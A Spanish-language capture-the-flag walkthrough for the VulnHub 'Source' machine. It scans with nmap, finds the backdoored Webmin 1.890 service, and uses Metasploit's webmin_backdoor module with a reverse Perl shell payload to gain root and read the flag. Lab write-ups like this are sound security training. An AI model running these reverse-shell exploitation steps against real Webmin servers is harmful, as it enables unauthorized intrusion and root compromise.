[VULNHUB] Source

Hoy vamos a hackear la maquina de Vulnhub llamada Source. Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/source-1,514/
  • Video
  • Enumeration
  • Empezamos con un nmap para ver que puertos tiene abiertos.
    sml@m0nique:~$ nmap -A -p- Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-31 13:13 CEST Nmap scan report for Host is up (0.0013s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 b7:4c:d0:bd:e2:7b:1b:15:72:27:64:56:29:15:ea:23 (RSA) | 256 b7:85:23:11:4f:44:fa:22:00:8e:40:77:5e:cf:28:7c (ECDSA) |_ 256 a9:fe:4b:82:bf:89:34:59:36:5b:ec:da:c2:d3:95:ce (ED25519) 10000/tcp open http MiniServ 1.890 (Webmin httpd) |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 57.45 seconds
    Podemos ver que tiene MiniServ con la version 1.890, la cual tiene una backdoor si es de sourceforge.
  • Exploitation
  • Arrancamos metasploit.
    Usaremos el modulo "exploit/linux/http/webmin_backdoor".
    msf5 > use exploit/linux/http/webmin_backdoor msf5 exploit(linux/http/webmin_backdoor) > show options Module options (exploit/linux/http/webmin_backdoor): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' RPORT 10000 yes The target port (TCP) SRVHOST yes The local host or network interface to listen on. This must be an address on the local machine or to listen on all addresses. SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL/TLS for outgoing connections SSLCert no Path to a custom SSL certificate (default is randomly generated) TARGETURI / yes Base path to Webmin URIPATH no The URI to use for this exploit (default is random) VHOST no HTTP server virtual host Payload options (cmd/unix/reverse_perl): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic (Unix In-Memory)
    Hacemos el "set" de los valores.
    msf5 exploit(linux/http/webmin_backdoor) > set lhost msf5 exploit(linux/http/webmin_backdoor) > set rhosts msf5 exploit(linux/http/webmin_backdoor) > set ssl true
    Y por ultimo, lanzamos el exploit!
    msf5 exploit(linux/http/webmin_backdoor) > exploit [*] Started reverse TCP handler on [*] Configuring Automatic (Unix In-Memory) target [*] Sending cmd/unix/reverse_perl command payload [*] Command shell session 1 opened ( -> at 2020-07-31 13:38:38 +0200 id uid=0(root) gid=0(root) groups=0(root)
  • root.txt
  • cd /root ls /root root.txt cat /root/root.txt THM{UPDATE_YOUR_INSTALL}
  • End
  • Y con esto ya seriamos root de la maquina